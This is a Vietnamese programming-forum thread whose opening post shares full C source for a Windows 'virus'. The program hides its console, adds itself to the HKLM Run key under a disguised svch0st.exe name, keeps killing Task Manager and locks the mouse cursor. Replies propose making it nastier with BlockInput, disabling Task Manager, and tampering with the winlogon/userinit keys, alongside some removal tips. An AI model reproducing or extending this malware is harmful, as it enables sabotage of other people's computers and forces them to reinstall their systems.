PDA

View Full Version : Viết virus khóa chuột - Lập trình virus trên C



AlexF
22-05-2009, 10:29 PM
Yêu cầu ai copy paste thì ghi rõ nhé bài viết thuộc về congdongcviet nhé

#include <windows.h>
#include <winbase.h>
#include <tlhelp32.h>
#include <ctype.h>
#include <string.h>

#define BUFSIZE 90

int test_key(void);
int create_key(char *);
int kill(void);

BOOL KillProcess(LPSTR lpszExecutable)
{
BOOL bResult = FALSE;
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
HANDLE hProcess, hProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(Process32First(hProcesses, &pe32)){
do{
if(CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, pe32.szExeFile, -1, lpszExecutable, -1) == CSTR_EQUAL){
if((hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID)) != NULL){
TerminateProcess(hProcess, 0); CloseHandle(hProcess); bResult = TRUE;
}
}
}while(Process32Next(hProcesses, &pe32));
CloseHandle(hProcesses);
}
return bResult;
}



int main(void)
{
int test,create;
test=test_key();

if (test==2)
{
char *path="c:\\WINDOWS\\svch0st.exe";
create=create_key(path);

}

HWND inv;
AllocConsole();
inv=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(inv,0);
int c;
for(c=0;c<999999999999;c++)
{
kill();
SetCursorPos(1,900);
Sleep(9);
}
}

int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}

reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;

RegCloseKey(hKey);
return check;
}

int create_key(char *path)
{
int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;

return check;
}

int kill(void)
{
return KillProcess("taskmgr.exe");
}

meoconlongvang
22-05-2009, 10:58 PM
@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win :D

p.o.l
23-05-2009, 01:40 AM
Hị hị.
Hồi trước cũng có tập tành viết virus.
Nhưng bi h có thêm mấy cái quản lý process rồi. kiểu này cũng dễ chống lắm.
Cái của bác coder_gate là kill lun task khi gọi thì dùng chương trình quản lý khác để kill con này. Còn nếu disable task như bác mèo nói thì vào regetry lấy lại :D Cách mà mún cho ng khác cài lại win nhanh nhất là reg lại key winlogon hoặc key của userinit. thằng nào không bik dùng dos là chít lun ;))

AlexF
23-05-2009, 11:07 AM
con này củ chuối ấy mà,lâu lâu thì up lên shared thôi chứ có mấy ý nghĩa đâu :)

ruoi trau
23-05-2009, 05:04 PM
hay hy vọng mấy bác chỉ giáo thêm
em đang học c mà hok hiểu ứng dụng, công dụng có thể làm gì và làm ??????
nên nhiều khi cũng nản
may nhờ đọc bài này thấy thay đổi hẳn

meoconlongvang
24-05-2009, 12:53 AM
Hị hị.
Hồi trước cũng có tập tành viết virus.
Nhưng bi h có thêm mấy cái quản lý process rồi. kiểu này cũng dễ chống lắm.
Cái của bác coder_gate là kill lun task khi gọi thì dùng chương trình quản lý khác để kill con này. Còn nếu disable task như bác mèo nói thì vào regetry lấy lại :D

Bạn vào được registry bằng cách nào khi cả bản phím và chuột đều bị đơ ? Trừ phi người dùng sửa stick key thành cmd để chạy regedit trước khi login.

quangthiennguyen
04-06-2009, 08:28 PM
@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win :D
Sao phải cài lại win cho mất công vậy.Bạn quên win còn khởi động ở chế độ safemode à.

C_moi_hoc
05-06-2009, 08:13 AM
Cho hỏi có mã nguồn trên rồi thì làm sao nữa???Hay là biên dịch trên máy mình luôn? Lỡ chính máy mình dính thì sao.
Em gà lắm, đừng chọc em

AlexF
05-06-2009, 08:23 AM
dính thì xóa phát là xong chứ gì đâu,thêm nữa biên dịch trên VC++ nha

quicksilver89
25-08-2009, 09:36 PM
@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win :D

cách bloginput kiểu ji vậy a mèo nói rõ cho cả nha nghe được ko vậy ):)T

meoconlongvang
25-08-2009, 09:54 PM
Là gọi hàm api BlockInput đó mà. Hàm này sẽ khóa chuột và bàn phím lại.

zstar
25-08-2009, 10:03 PM
với con virus thế này chống dễ dàng quá ! (Y:DY) (Y:DY)
có thể dùng chương trình Process Explorer để Kill , suspend nó lại
hoặc tự viết 1 chương trình để kiểm soát các tiến trình đang chạy (Y:DY)

DarkWizard
26-08-2009, 09:32 AM
Bạn vào được registry bằng cách nào khi cả bản phím và chuột đều bị đơ ? Trừ phi người dùng sửa stick key thành cmd để chạy regedit trước khi login.

Vào safemode mà xóa nó là xong ?(:-)?

meoconlongvang
26-08-2009, 01:00 PM
Có rất nhiều khóa reg cho phép chạy trong safe mode đó bạn. Safe mode không phải lúc nào cũng an toàn.

DarkWizard
26-08-2009, 06:29 PM
Có rất nhiều khóa reg cho phép chạy trong safe mode đó bạn. Safe mode không phải lúc nào cũng an toàn.

1 reg key của dungcoi là 1 ví dụ

itlboy
28-08-2009, 12:18 AM
Đây mà là virus à. Đây chỉ là một chương trình mang tính phá hoại thông thường (hoặc không, tùy mục đích sử dụng). Điểm mấu chốt của virus đó là khả năng lây lan, phát tán, tự sao chép.....

meoconlongvang
28-08-2009, 11:30 AM
Đây là virus đơn giản mà. Theo mình thì phần phá hoại và lây lan mới làm nên tên tuổi của virus. Một chương trình chỉ lây lan tùm lum mà chẳng phá hoại gì thì chỉ được gọi là chương trình tạo rác chứ không phải là virus.

dongson_hongduc
01-09-2009, 05:25 PM
hay lắm .các bác cho em hỏi liệu em chạy song máy em có bị dính con nay suốt đời ko.

dongson_hongduc
01-09-2009, 05:26 PM
máy em vừa chạy exe song thì chuột đơ luôn .

forever0602
13-09-2009, 10:39 PM
minh moi tap tanh ve tin hoc. minh cung rat nghien may con virus may tinh nay! neu co the cho minh xin mot vai tai lieu tham khao duoc ko? minh cam on!

AlexF
03-07-2010, 09:37 AM
@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win :D

BlockInput nó không chạy được trên vista,windows 7 ( nếu không có quyền Admin ) (:#)(:#)(:#)(:#)

windows
03-07-2010, 09:57 AM
Win7, vista thì cũng đâu cho ghi trực tiếp vào HKLM phải không ? :D